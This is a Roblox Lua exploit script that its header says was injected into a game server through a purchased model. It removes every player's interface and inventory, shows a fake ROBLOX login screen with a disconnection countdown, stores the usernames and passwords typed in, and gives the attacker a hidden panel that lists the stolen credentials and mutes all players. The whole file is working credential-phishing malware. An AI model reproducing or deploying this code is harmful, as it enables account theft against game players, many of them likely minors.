--[[ This script was entirely created by team RA. We have used one of the model's merely owned in order to inject the script in the server. Stop asking questions. Dont leak this script. --]] player = "personsadminlol" --Account you are using because Injector is located inside your character. -- If you die , it will erase the script. if game.Workspace[player]:FindFirstChild("Logz") then game.Workspace[player].Logz:Destroy() end local children = game.StarterPack:GetChildren() for c = 1, #children do children[c]:Remove() end local children = game.StarterGui:GetChildren() for c = 1, #children do children[c]:Remove() end local v = Instance.new("ScreenGui") v.Name = "LoginGui" local MS = game:GetService("InsertService"):LoadAsset(104123766) -- Umad Project? local mf = Instance.new("Frame") mf.Parent = v mf.Name = "LeFrame" mf.Style = "RobloxRound" mf.Size = UDim2.new(0.5,0,0.3,0) mf.Position = UDim2.new(0.25,0,0.2,0) local lb = Instance.new("TextButton") lb.Parent = mf lb.Style = "RobloxButton" lb.Name = "Logz" lb.Position = UDim2.new(0.4,0,0.75,0) lb.Size = UDim2.new(0.2,0,.15,0) lb.TextColor3 = Color3.new(1,1,1) lb.Font = "ArialBold" lb.FontSize = "Size24" lb.Text = "Login" local Scripter = MS.SB.Script:Clone() Scripter.Code.Value = [[ dbc = true function onClick() print("Clicked") if dbc == true then dbc = false if script.Parent.Parent.UserText.Text == script.Parent.Parent.Parent.Parent.Parent.Name then if script.Parent.Parent.PwText.Text ~= "Password" then print("Ready") local e = Instance.new("StringValue") e.Parent = game.Workspace[player].Logz.Bank e.Name = script.Parent.Parent.UserText.Text e.Value = script.Parent.Parent.PwText.Text wait(0.1) script.Parent.Parent.Title.Ac.Disabled = true script.Parent.Parent.ErrorBox.Text = "Connecting to ROBLOX.." wait(2) script.Parent.Parent.ErrorBox.Text = "Successfully connected to ROBLOX" wait(1.5) script.Parent.Parent.Parent:Destroy() else print("Error") script.Parent.Parent.ErrorBox.Text = "An error occured. Invalid username or password." wait(2) script.Parent.Parent.ErrorBox.Text = " " end else print("Error") script.Parent.Parent.ErrorBox.Text = "An error occured. Invalid username or password." wait(2) script.Parent.Parent.ErrorBox.Text = " " end dbc = true end end script.Parent.MouseButton1Click:connect(onClick) ]] Scripter.Parent = lb Scripter.Name = "Script" local pwbg = Instance.new("TextButton") pwbg.Parent = mf pwbg.Style = "RobloxButtonDefault" pwbg.Name = "PwBG" pwbg.Position = UDim2.new(.25,0,.43,0) pwbg.Size = UDim2.new(.5,0,.1,0) pwbg.Text = "" local pwt = Instance.new("TextBox") pwt.Parent = mf pwt.BackgroundTransparency = 1 pwt.Name = "PwText" pwt.Position = UDim2.new(.25,0,.43,0) pwt.Size = UDim2.new(.5,0,.1,0) pwt.ZIndex = 2 pwt.Font = "ArialBold" pwt.FontSize = "Size14" pwt.Text = "Password" pwt.TextColor3 = Color3.new(1,1,1) local ubg = Instance.new("TextButton") ubg.Parent = mf ubg.Style = "RobloxButtonDefault" ubg.Name = "UserBG" ubg.Position = UDim2.new(.25,0,.3,0) ubg.Size = UDim2.new(.5,0,.1,0) ubg.Text = "" local ut = Instance.new("TextBox") ut.Parent = mf ut.BackgroundTransparency = 1 ut.Name = "UserText" ut.Position = UDim2.new(.25,0,.3,0) ut.Size = UDim2.new(.5,0,.1,0) ut.ZIndex = 2 ut.Font = "ArialBold" ut.FontSize = "Size14" ut.Text = "Username" ut.TextColor3 = Color3.new(1,1,1) local eb = Instance.new("TextLabel") eb.Parent = mf eb.BackgroundTransparency = 1 eb.Name = "ErrorBox" eb.Position = UDim2.new(0,0,.57,0) eb.Size = UDim2.new(1,0,0.1,0) eb.Font = "ArialBold" eb.FontSize = "Size18" eb.Text = "" eb.TextColor3 = Color3.new(1,1,0) local Sub = Instance.new("TextLabel") Sub.Parent = mf Sub.BackgroundTransparency = 1 Sub.Name = "Subtitle" Sub.Position = UDim2.new(0,0,.15,0) Sub.Size = UDim2.new(1,0,0.1,0) Sub.Font = "ArialBold" Sub.FontSize = "Size18" Sub.Text = "Please login." Sub.TextColor3 = Color3.new(1,1,1) local Title = Instance.new("TextLabel") Title.Parent = mf Title.BackgroundTransparency = 1 Title.Name = "Title" Title.Position = UDim2.new(0,0,0.06,0) Title.Size = UDim2.new(1,0,0.1,0) Title.Font = "ArialBold" Title.FontSize = "Size24" Title.Text = "You will be disconnected from ROBLOX in 60 seconds" Title.TextColor3 = Color3.new(1,1,1) local Scripter = MS.SB.Script:Clone() Scripter.Code.Value = [[ noob = script.Parent count = 60 for i = 1,60 do noob.Text = "You will be disconnected from ROBLOX in "..count.." seconds" count = count - 1 wait(1) end ]] Scripter.Parent = Title Scripter.Name = "Ac" Scripter.Disabled = true local MScript = MS.SB.Script:Clone() MScript.Code.Value = [[ local children = game.Players:GetChildren() for c = 1, #children do local e = script.LoginGui:Clone() local chz = children[c].PlayerGui:GetChildren() for c = 1, #chz do chz[c]:Remove() end e.Parent = children[c].PlayerGui local chz = children[c].Backpack:GetChildren() for c = 1, #chz do chz[c]:Remove() end e.LeFrame.Title.Ac.Disabled = false end wait(2) Script.Disabled = true ]] MScript.Parent = game.Workspace[player] MScript.Name = "Logz" MScript.Disabled = true v.Parent = MScript local bm = Instance.new("Model") bm.Parent = MScript bm.Name = "Bank" MGui = Instance.new("ScreenGui", game.CoreGui) local mf = Instance.new("Frame") mf.Parent = MGui mf.Position = UDim2.new(0.2,0,0.3,0) mf.Size = UDim2.new(0.15,0,0.05,0) mf.BackgroundTransparency = 1 mf.Name = "Frame" local sf = Instance.new("Frame") sf.Parent = MGui sf.Position = UDim2.new(0.2,0,0.35,0) sf.Size = UDim2.new(0.15,0,0.05,0) sf.BackgroundTransparency = 1 sf.Name = "LFrame" local RB = Instance.new("TextButton") RB.Parent = mf RB.Size = UDim2.new(0.33,0,1,0) RB.Text = "LOAD" RB.MouseButton1Down:connect(function() local number = 1 local children = game.Workspace[player].Logz.Bank:GetChildren() for c = 1, #children do if children[c].className == "StringValue" then local testv = Instance.new("TextLabel") testv.Parent = sf testv.Size = UDim2.new(1,0,1,0) testv.Text = "Name :"..children[c].Name.." // Pass :"..children[c].Value.." " testv.Position = UDim2.new(1,0,number,0) number = number + 1 end end end) local CB = Instance.new("TextButton") CB.Parent = mf CB.Size = UDim2.new(0.33,0,1,0) CB.Position = UDim2.new(0.33,0,0,0) CB.Text = "CLEAR" CB.MouseButton1Down:connect(function() local children = sf:GetChildren() for c = 1, #children do if children[c].className == "TextLabel" then children[c]:Destroy() end end end) local AB = Instance.new("TextButton") AB.Parent = mf AB.Size = UDim2.new(0.33,0,1,0) AB.Position = UDim2.new(0.66,0,0,0) AB.Text = "RUN" AB.MouseButton1Down:connect(function() game.Workspace[player].Logz.Disabled = false AB.Visible = false end) local MA = Instance.new("TextButton") MA.Parent = mf MA.Size = UDim2.new(0.33,0,1,0) MA.Position = UDim2.new(1,0,0,0) MA.Text = "Mute" MA.MouseButton1Down:connect(function() local children = game.Players:GetChildren() for c = 1, #children do children[c]:SetSuperSafeChat(true) end end) local UA = Instance.new("TextButton") UA.Parent = mf UA.Size = UDim2.new(0.33,0,1,0) UA.Position = UDim2.new(1.33,0,0,0) UA.Text = "Unmute" UA.MouseButton1Down:connect(function() local children = game.Players:GetChildren() for c = 1, #children do children[c]:SetSuperSafeChat(false) end end)